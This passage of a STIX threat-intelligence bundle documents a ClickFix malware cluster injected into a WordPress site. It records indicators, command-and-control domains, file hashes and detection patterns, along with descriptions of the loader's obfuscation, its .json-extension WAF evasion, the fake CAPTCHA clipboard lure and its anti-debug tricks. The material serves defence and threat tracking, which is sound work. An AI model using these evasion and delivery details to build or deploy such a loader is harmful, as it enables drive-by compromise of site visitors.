      "id": "relationship--0e71275a-95e5-4989-ab53-1d90afe9cccd",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--13f0aada-9f92-48db-a400-084ec547cb57",
      "target_ref": "malware--1e5b20ef-8419-4d22-b0c1-60dbdb82bba3"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bc65ad02-7917-4a43-90ae-9c11a4d60759",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--eecca675-f1c7-4c72-b8c9-bf481b1e767c",
      "target_ref": "malware--1e5b20ef-8419-4d22-b0c1-60dbdb82bba3"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cac3e9ea-32c6-44a4-8f43-4ec1b58e5cee",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--9f4605b2-917e-4844-b228-26c8e2659e4c",
      "target_ref": "malware--1e5b20ef-8419-4d22-b0c1-60dbdb82bba3"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5773b364-450a-4575-a63d-00a014c1908a",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "attributed-to",
      "source_ref": "campaign--165c2be8-c4d6-4389-9a30-88d5d589f88f",
      "target_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4c55e08f-9454-482f-8d16-bed6004d6955",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--5552b4e5-d69a-4def-b51d-15f7e14deaef"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--abb7fb0a-1315-4d41-9da0-7ba35564e71a",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--06a150f4-ffa1-47e4-beb4-7cc91f50c537"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6cb58393-972e-4c23-a3ab-a54d31cf99d1",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--114e81d2-b996-4d5f-a9b1-d55e78b79aa8"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--35d145b3-e508-46a8-b977-1ddc08409574",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--4dab7fa0-6671-4954-bbf8-78df78f4f939"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a035ec10-2d37-40e2-a8e3-69a3cee9e479",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--f3f3c056-4cf8-469e-8ea2-3529b7c656ad"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b32b8faf-0ec8-4899-9dc6-1380edaa9e28",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--365dbf0a-4202-4c24-9205-4e8455a93a55"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ebb9115c-5abd-47d3-a3c2-94509f242bff",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--bf614ebf-b976-44e2-ab21-869b2d5108cc"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ebfdf5a8-61f3-4564-a51c-25b0c9cca75c",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--3c2812fc-e9a1-4ae8-bf5a-9e1c5398cdb9"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--46970cf2-09ca-4f37-b814-38434419b9f0",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--905c00c3-d29c-45ae-a260-c7fad3edeea8"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5d24d8e9-5e69-415c-bd45-73217d1f01d6",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--821c74bc-675b-45a3-a335-865f1199c00d"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3b063fa5-ba16-42fb-a330-dc4744332b1d",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--b9f4edaa-4e36-491a-a2da-9e915da92c16"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--32931cc9-182e-4573-a775-a12a0f6f0a7f",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--73d46035-d53f-43ac-a23e-1587e08a7c43"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8b93c29e-f1a3-47ac-87d5-d8bc23271c14",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "target_ref": "attack-pattern--69a5272e-3422-400a-b74b-d74877c3b104"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "TDS Cluster \u2014 AS202412 / ntdnewtds infrastructure (March 20 proto-build)",
      "description": "Earliest known build of the SL-ADV-007 TDS cluster. Dated March 20, 2026 \u2014 47 days before V3 (May 6) and ~60 days before V1/V2. Confirms the cluster has been active since at least Q1 2026. All core TTPs present: window.__performance_optimizer_v6 guard, synchronous XHR TDS loader, Shadow DOM overlay, 50-language ClickFix lure, localStorage+cookie victim dedup, setInterval(trap, 4000), Function.constructor sandbox escape. Delivered alongside a legitimate Cloudflare RUM beacon script (stuff3.json) as a two-file bundle injected into the4ssst.ca WordPress site.",
      "threat_actor_types": [
        "criminal",
        "financially-motivated"
      ],
      "sophistication": "advanced",
      "resource_level": "individual",
      "primary_motivation": "financial-gain",
      "aliases": [
        "AS202412 TDS Actor",
        "SL-ADV-007 cluster"
      ],
      "labels": [
        "clickfix",
        "tds",
        "shadow-dom",
        "multilingual",
        "proto-build",
        "q1-2026"
      ]
    },
    {
      "type": "campaign",
      "spec_version": "2.1",
      "id": "campaign--8ff91c87-e1b7-49fe-823f-c9b6108cd46f",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "SL-ADV-007-V4: TDS Cluster Proto-Build \u2014 March 20 2026, the4ssst.ca",
      "description": "Earliest confirmed build of the SL-ADV-007 ClickFix TDS cluster. March 20, 2026. Injected into the4ssst.ca cannabis dispensary site. Delivered as two .json-named files: legitimate Cloudflare RUM beacon (cover) + 804KB obfuscated ClickFix lure engine. Establishes cluster active since at least Q1 2026. Core capability set (50-lang lure, Shadow DOM, localStorage dedup) fully present in this earliest build \u2014 not evolved in later versions, only delivery mechanism and obfuscation strategy changed.",
      "first_seen": "2026-03-20T00:00:00Z",
      "last_seen": "2026-03-20T00:00:00Z",
      "labels": [
        "clickfix",
        "shadow-dom",
        "multilingual",
        "tds",
        "v4",
        "proto-build",
        "the4ssst",
        "march-2026"
      ]
    },
    {
      "type": "malware",
      "spec_version": "2.1",
      "id": "malware--ac9360a1-9349-4d4c-a358-9717ccdb4ee5",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "TDS Stage-1 JS Loader + ClickFix Engine \u2014 Variant 4 / Proto-build (March 20, 2026)",
      "description": "Earliest known build of the SL-ADV-007 ClickFix TDS loader cluster. Recovered from the4ssst.ca, dated March 20 2026. 804,081 bytes (stuff3b.json), 3,295 lines post dead-code removal.\n\nCIPHER: RC4+Base64 via _0x49c2 decoder. String array _0x3625: 17,443 entries. Rotation offset: 337,271. Base offset: -342.\n\nDELIVERY: Two-file bundle injection:\n  stuff3.json (31,169 bytes) \u2014 Cloudflare RUM beacon script (LEGITIMATE). Webpack bundle, modules 36/173/559/570/613/976. Sends performance telemetry to cloudflareinsights.com/cdn-cgi/rum via navigator.sendBeacon. Used as cover/legitimacy prop alongside the malicious payload.\n  stuff3b.json (804,081 bytes) \u2014 malicious ClickFix TDS loader.\n\nSTRUCTURE:\n- Lines 1-8: file header\n- Line 2: string array _0x3625 (17,443 encoded entries)\n- Line 9: array rotation bootstrap IIFE (_0x3625, 337271)\n- Line 120: decoder _0x49c2 (RC4+Base64, offset -342)\n- Lines 306-379: anti-debug IIFE (integrity checker)\n- Lines 379-625: once-wrapper factory + console-override anti-debug\n- Line 625: _0x211230() entry-point call\n- Lines 626-3237: main ClickFix lure engine IIFE\n  - Lines 627-2062: config dictionary (_0x3971bc)\n  - Lines 2063-2122: 50-language localization map (identical language set to V3)\n  - Lines 2123-2128: localStorage/cookie state setup\n  - Lines 2129-3236: payload functions:\n    _0x363bd9 (\u2261V3._0x466e6): localStorage dedup + document.referrer check\n    _0x95087f (\u2261V3._0x27ea40): DOM element creator\n    _0x404742 (\u2261V3._0x121d95): Shadow DOM host builder (attachShadow)\n    _0x5f1a4b: element factory with className/id\n    _0x3bace6 (\u2261V3._0x5397f8): language detector via navigator.language\n    _0x53aa8c (\u2261V3._0x50e295): TDS XHR + script injector\n    _0x56217f (\u2261V3._0x587964): ClickFix lure renderer (per-locale Cloudflare CAPTCHA)\n    _0x1d8f73 (\u2261V3._0x33532a): setTimeout 30000ms (V4!) / overlay handler\n    _0x579902 (\u2261V3._0x3a8acb): cookie setter + localStorage persistence\n    _0x4c9138 (\u2261V3._0x3b6d88): DOM cleanup handler\n    _0x485c68 (\u2261V3._0x194b13): window.addEventListener message-channel\n    _0x4f02f8 (\u2261V3._0x110bc6): entry-point orchestrator\n- Lines 3238-3295: setInterval(_0x48bb7d, implicit) debugger trap\n\nKEY DELTA FROM V3 (May 6):\n- Auto-dismiss timer: 30,000ms (30 sec) in V4 vs 240,000ms (4 min) in V3 \u2014 operator shortened exposure window in later builds\n- String array: 17,443 entries vs 17,914 (V3) \u2014 slightly smaller, possible code pruning\n- Rotation offset: 337,271 vs 311,002 (V3) \u2014 different build\n- Decoder base offset: -342 vs -196 (V3) \u2014 different index base\n- Function count: 14 vs 12 in V3 \u2014 two additional helper functions\n- Delivered as JSON-named files (.json extension) vs .js in later variants \u2014 early WAF/content-type evasion attempt\n- Paired with legitimate Cloudflare RUM script as legitimacy cover\n- .json extension on both files: likely to evade JS-specific WAF rules",
      "malware_types": [
        "trojan",
        "dropper"
      ],
      "is_family": false,
      "labels": [
        "tds",
        "clickfix",
        "stage1",
        "rc4-b64",
        "shadow-dom",
        "multilingual",
        "proto-build",
        "json-extension-evasion",
        "cloudflare-rum-cover",
        "v4",
        "march-2026"
      ],
      "architecture_execution_envs": [
        "browser"
      ],
      "implementation_languages": [
        "javascript"
      ],
      "capabilities": [
        "anti-debugging",
        "anti-vm",
        "remote-code-execution",
        "obfuscated-payloads",
        "user-interface-spoofing"
      ]
    },
    {
      "type": "malware",
      "spec_version": "2.1",
      "id": "malware--3f399c83-6acb-45da-b156-cfb1720fa906",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "Cloudflare RUM beacon (stuff3.json) \u2014 used as legitimacy cover",
      "description": "Legitimate Cloudflare Real User Monitoring beacon script (31,169 bytes). Webpack bundle, modules: 36 (sendObjectBeacon), 173 (web-vitals: CLS/LCP/FCP/TTFB/FID/INP), 559/570/613/976 (performance observers). Sends telemetry to https://cloudflareinsights.com/cdn-cgi/rum via navigator.sendBeacon or XMLHttpRequest fallback. data-cf-beacon attribute used for site token. NOT malicious in itself \u2014 included in the two-file injection bundle alongside stuff3b.json to make the bundle appear as routine Cloudflare analytics traffic. Classic legitimacy-prop technique: pair malware with a recognisable, trusted script to reduce analyst suspicion and potentially satisfy WAF allow-list rules.",
      "malware_types": [
        "trojan"
      ],
      "is_family": false,
      "labels": [
        "legitimate-tool-abuse",
        "cloudflare-rum",
        "cover-file",
        "legitimacy-prop",
        "v4"
      ],
      "architecture_execution_envs": [
        "browser"
      ],
      "capabilities": []
    },
    {
      "type": "note",
      "spec_version": "2.1",
      "id": "note--4cf535ed-0ad3-40b1-bb08-427c0d4312d7",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "abstract": "Complete SL-ADV-007 cluster timeline V4\u2192V3\u2192V1\u2192V2 (March\u2013May 2026)",
      "content": "Complete chronological reconstruction of the SL-ADV-007 TDS cluster:\n\nV4 (stuff3b.json, March 20 2026) \u2014 PROTO-BUILD. Earliest known.\n  Delivered as .json files alongside Cloudflare RUM cover script.\n  17,443 string entries. Rotation 337,271. Decoder _0x49c2, offset -342.\n  30-second auto-dismiss timer. 14 payload functions.\n  Full 50-language ClickFix engine. Shadow DOM. localStorage dedup.\n\nV3 (stuff2.js, May 6 2026) \u2014 FULL ENGINE BUILD. +47 days.\n  Standalone .js. 17,914 string entries. Rotation 311,002. Offset -196.\n  240-second auto-dismiss (8x longer than V4 \u2014 operator UX tuning).\n  12 payload functions (2 helpers removed/merged vs V4).\n  Full 50-language ClickFix engine retained. Shadow DOM. localStorage dedup.\n\nV1 (god-help-me.js/stuff.js, ~May 12-18 2026) \u2014 LOADER SEPARATION. +55-62 days.\n  Standalone .js. 39,565 string entries (2.3x V3 \u2014 heavy obfuscation increase).\n  Lure UI offloaded to TDS second-stage (operator splits concerns).\n  4 anti-debug layers. /jsrepo endpoint. 2 TDS domains.\n\nV2 (stuff1.js, ~May 18 2026) \u2014 DELIVERY EVOLUTION. +62 days.\n  WordPress bundle-prepend. Loader CLEARTEXT (no obfuscation on injection mechanism).\n  758 string entries (anti-debug only). /teamrepo endpoint (new path).\n  3 TDS domains (sdntds.shop added). Bundle hijack delivery.\n\nEVOLUTION PATTERN:\n  March: .json extension evasion + CF RUM cover (WAF bypass focus)\n  May 6: Extension dropped, timer increased, minor code cleanup\n  May 12+: Lure separated from loader, obfuscation massively increased\n  May 18: Loader cleartext + bundle hijack (stealth through legitimacy vs obfuscation)\n\nSHARED FINGERPRINTS (all 4 variants):\n  window.__performance_optimizer_v6 dedup guard\n  Synchronous XHR GET + createElement('script') + .text + head.appendChild\n  Math.random() cache-buster on TDS URL\n  setInterval(debugger_trap, 4000)\n  Function.constructor('return this') sandbox escape\n  RC4+Base64 cipher (obfuscator.io)\n  _0x3625/_0x59bb/_0x490f string array function names\n  50-language localization map (V4 + V3; offloaded to TDS in V1/V2)\n  ntdnewtds.shop + dnsnewtds.shop TDS infrastructure",
      "object_refs": [
        "malware--ac9360a1-9349-4d4c-a358-9717ccdb4ee5",
        "threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--b2dfe587-9e56-4725-8a91-1016bacf5d61",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "ntdnewtds.shop \u2014 Primary TDS C2 (all variants, confirmed March 2026+)",
      "description": "Primary TDS C2 active since at least March 20, 2026. Shared across V1\u2013V4.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "ntdnewtds",
        "all-variants",
        "march-2026-confirmed"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--ed963832-b888-4739-bea7-9a78eb5364e8",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "dnsnewtds.shop \u2014 Fallback TDS C2 (all variants, confirmed March 2026+)",
      "description": "Fallback TDS C2 active since at least March 20, 2026.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "dnsnewtds",
        "all-variants",
        "march-2026-confirmed"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--4981b3b3-d2e2-4d1c-a4a2-8e691dfe2be9",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "the4ssst.ca \u2014 Compromised WordPress target site",
      "description": "Cannabis dispensary WordPress site confirmed compromised as of March 20, 2026. Two-file bundle (stuff3.json + stuff3b.json) injected into site JS assets. Earliest confirmed victim/host site in the SL-ADV-007 cluster.",
      "infrastructure_types": [
        "hosting-malware"
      ],
      "labels": [
        "compromised-site",
        "wordpress",
        "cannabis-dispensary",
        "the4ssst.ca",
        "victim-host"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--48805e62-ccb9-4904-accf-24ff35396e71",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "File: stuff3b.json \u2014 V4 March-20 loader (804,081 bytes)",
      "description": "Earliest known SL-ADV-007 build. .json extension used for WAF evasion.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:hashes.MD5 = '25e90438c448898c2b8fa0814ccbd0c8' OR file:hashes.'SHA-1' = '85590cac2455a48ef1231a27dca94294de292b96' OR file:hashes.'SHA-256' = '339e0e018b48a118c36c0b7181b143c255ebad19c5f628a1a57903592f07df94']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "v4",
        "march-20",
        "file-hash",
        "proto-build"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e14416aa-6d76-4d6c-a891-766c882e8dc9",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "File: stuff3.json \u2014 Cloudflare RUM cover file (31,169 bytes)",
      "description": "Legitimate CF RUM script used as cover. Presence alongside malicious .json file is the IOC.",
      "indicator_types": [
        "anomalous-activity"
      ],
      "pattern": "[file:hashes.MD5 = '4f67ea9205c3ca7c9e04582d3b9bdd1d' OR file:hashes.'SHA-256' = '4b77eae349a8cbcea7133cf3640a64ebf1f69d54d8f6469d7be6fdc188ca4ca4']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "cover-file",
        "cloudflare-rum",
        "legitimacy-prop"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8cfcf337-0d4c-4f96-ba49-67a7255c1294",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "Domain: ntdnewtds.shop (active since March 2026)",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'ntdnewtds.shop']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "tds",
        "c2",
        "shared",
        "earliest-confirmed"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--161124c4-d98f-42d0-87db-b16857807b07",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "Domain: dnsnewtds.shop (active since March 2026)",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'dnsnewtds.shop']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "tds",
        "c2",
        "shared",
        "earliest-confirmed"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a4c64c4e-f824-49c4-920c-29a642e7456b",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "Delivery pattern: malicious JS with .json extension (WAF evasion)",
      "description": "V4 delivers both files with .json extension instead of .js. Evades WAF rules that inspect/block JavaScript by content-type or extension. Detection heuristic: .json files beginning with obfuscated JS patterns or '!function(){' should be flagged for review.",
      "indicator_types": [
        "malicious-activity",
        "anomalous-activity"
      ],
      "pattern": "[file:name MATCHES '\\.json$' AND file:content MATCHES '^[;!]?function _0x|^;\\s*function _0x']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "json-extension",
        "waf-evasion",
        "detection-heuristic",
        "v4"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f2efd379-27b0-493f-a58e-3587e75ee694",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "JS artifact: window.__performance_optimizer_v6 (all variants, March 2026+)",
      "description": "Shared dedup guard across all 4 variants. Active since at least March 20, 2026.",
      "indicator_types": [
        "malicious-activity",
        "anomalous-activity"
      ],
      "pattern": "[file:content MATCHES '__performance_optimizer_v6']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "shared-ioc",
        "all-variants",
        "attribution",
        "march-2026"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f9918948-fad5-4b36-8466-d1a7002c5a63",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "Behaviour delta: 30s auto-dismiss timer (V4) vs 240s (V3)",
      "description": "V4 uses setTimeout 30,000ms for overlay auto-dismiss. V3 uses 240,000ms. This 8x reduction between March and May builds suggests operator testing or preference for shorter victim exposure window.",
      "indicator_types": [
        "anomalous-activity"
      ],
      "pattern": "[file:content MATCHES 'setTimeout.*30000']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "timer-delta",
        "v4-specific",
        "30s",
        "evolution-marker"
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--9c21e0c6-4300-4fa0-85cf-617f887f4608",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1059.007 \u2014 Command and Scripting Interpreter: JavaScript",
      "description": "V4 proto-build: full ClickFix lure engine in obfuscated JS delivered as .json files. Synchronous XHR to TDS + script injection into document.head. Same mechanism as V1-V3.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1059/007",
          "external_id": "T1059.007"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--09d6b4b8-1ab2-4514-bf39-c2c69277b243",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1027 \u2014 Obfuscated Files or Information",
      "description": "RC4+Base64 via _0x49c2. 17,443-entry string array _0x3625, rotation 337,271, base offset -342. All strings, DOM methods, CSS properties, locale text encoded.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1027",
          "external_id": "T1027"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d052c8f6-7ff8-4887-beda-6034b4981333",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1027.010 \u2014 Command Obfuscation",
      "description": "TDS endpoint URLs, navigator.language calls, document APIs all RC4+Base64 encoded throughout.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1027/010",
          "external_id": "T1027.010"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--918c612f-57dd-4882-ae11-7c96eaf3a6fd",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1036.005 \u2014 Masquerading: Match Legitimate Name or Location",
      "description": "V4-specific: both malicious files use .json extension (stuff3.json, stuff3b.json) to masquerade as data/config files rather than executable JavaScript. Evades WAF rules targeting .js extensions and JS content-type inspection.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1036/005",
          "external_id": "T1036.005"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--1ed9c8ee-4be8-4196-ba0e-65b49da81a14",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1036 \u2014 Masquerading: Legitimate Tool Bundling",
      "description": "Legitimate Cloudflare RUM beacon script (stuff3.json) bundled alongside malicious payload as a legitimacy prop. Analysts seeing Cloudflare analytics traffic less likely to flag bundle.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1036",
          "external_id": "T1036"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e8bd5fe3-e15f-4b32-9620-058938616094",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1497.001 \u2014 Virtualization/Sandbox Evasion: System Checks",
      "description": "setInterval(trap, 4000) + Function.constructor('return this') sandbox escape. Anti-debug IIFE at line 306, once-wrapper factory at line 379. Identical pattern to V3.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1497/001",
          "external_id": "T1497.001"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--21da9b60-9393-47fa-9163-d82e14bf4439",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1189 \u2014 Drive-by Compromise",
      "description": "Injected into the4ssst.ca WordPress dispensary site. Earliest confirmed victim site in the cluster \u2014 March 20, 2026.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1189",
          "external_id": "T1189"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e88d64db-0290-4273-82a2-2a7071da66b5",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1203 \u2014 Exploitation for Client Execution",
      "description": "Shadow DOM fake Cloudflare CAPTCHA overlay. clipboard.writeText(PowerShell_payload). 50-language locale-aware lure text. 30-second auto-dismiss.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1203",
          "external_id": "T1203"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6474ec87-07d3-4b3b-ae22-79939ff853c0",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1185 \u2014 Browser Session Hijacking / Victim Tracking",
      "description": "localStorage key + document.cookie set after overlay display. Prevents repeat lure display \u2014 victim state persisted across sessions.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1185",
          "external_id": "T1185"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--abc48e17-1429-421a-943d-bc93b63c8a15",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1566.002 \u2014 Phishing: Spearphishing Link",
      "description": "Victims arrive at compromised dispensary site organically or via referral.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1566/002",
          "external_id": "T1566.002"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--b7c4341a-1acb-4a18-a15a-2708ed6c9cc6",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-03-20T00:00:00.000Z",
      "name": "T1140 \u2014 Deobfuscate/Decode Files or Information",
      "description": "RC4+Base64 decoding at runtime. atob() calls for TDS URLs within decoded strings.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1140",
          "external_id": "T1140"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
